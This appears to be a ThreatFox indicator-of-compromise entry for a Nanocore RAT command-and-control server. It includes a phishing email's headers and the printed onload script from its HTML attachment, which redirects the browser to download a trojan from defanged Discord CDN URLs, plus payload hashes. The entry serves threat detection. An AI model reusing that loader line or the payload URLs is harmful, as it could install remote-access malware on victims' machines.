ThreatFox IOC Database

You are viewing the ThreatFox database entry for ip:port 107.173.60.45:54955.

Database Entry


IOC ID:338453
IOC: 107.173.60.45:54955
IOC Type :ip:port
Threat Type :botnet_cc
Malware: Nanocore RAT
Malware alias:Nancrat, NanoCore
Confidence Level : Confidence level is high (100%)
ASN:AS36352 AS-COLOCROSSING
Country:- US
First seen:2022-01-26 05:37:05 UTC
Last seen:2023-09-27 18:39:16 UTC
UUID:ff0a44e8-7e69-11ec-a824-42010aa4000a
Reporter AndreGironda
Reward 5 credits from ThreatFox
Tags:NanoCore
Reference: https://tria.ge/220126-f2ypvahabm

Avatar
AndreGironda
MITRE T1566.001
Date: 24 Jan 2022 17:30-18:00 -0600
Received: from ec2-54-190-122-137.us-west-2.compute.amazonaws.com ([54.190.122.137]:58197 helo=aerosoftint.com)
From: Accountant John <john-accountant@aerosoftint.com>
Subject: Request Quote from <removed recipient>
Message-ID: <20220124174126.B3A89908F0BC140D@aerosoftint.com>
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="----=_NextPart_000_0012_69607DD8.B7F4E8A2"
X-Get-Message-Sender-Via: 142-4-8-116.ipage.com: authenticated_id: john-accountant@aerosoftint.com
X-Authenticated-Sender: 142-4-8-116.ipage.com: john-accountant@aerosoftint.com
Return-Path: john-accountant@aerosoftint.com
Attachment Name: Request Quote.HTML
Attachment SHA256: ef733c4a6e537260493b7e922597b4bcbdcf4138dae761ae47c30aab32ebb95e
HTML/JavaScript Code --
<body onload="javascript:window.location[.]href='hXXps://cdn.discordapp[.]com/attachments/934342695831359538/935223865989300274/Request_Quote.exe';">

Stage 1 URL: hXXps://cdn.discordapp[.]com/attachments/934342695831359538/935223865989300274/Request_Quote.exe
Stage 1 Executable SHA256: 0473e6ff120bab9fa26ef8c0037f9917df6ac59d1ce08ba0d08fabb1f2fe664d
Unpacked DLL SHA256: 2c26fa066bf21dd098d73c67c326e2dff060066fd5dfec42e41df851a5b62150
Stage 2 URL: hXXps://cdn.discordapp[.]com/attachments/934342695831359538/934343586403713054/world.exe
Nanocore Executable SHA256: c5d68d3abd9d6f9b094ea1bdb064ca709cc54de13f86856c4ffe34c64148c87c

Malware Samples


The table below documents recent malware samples observed that are associated with this indicator of compromise (IOC).

Time stamp (UTC)SHA256 hashBazaar
2022-01-31 12:51:08 480e1fcbda99f72a92429194acfc2aa7824ed12c1296a0396f2e44493c7291b1
2022-01-26 08:41:18 c5d68d3abd9d6f9b094ea1bdb064ca709cc54de13f86856c4ffe34c64148c87c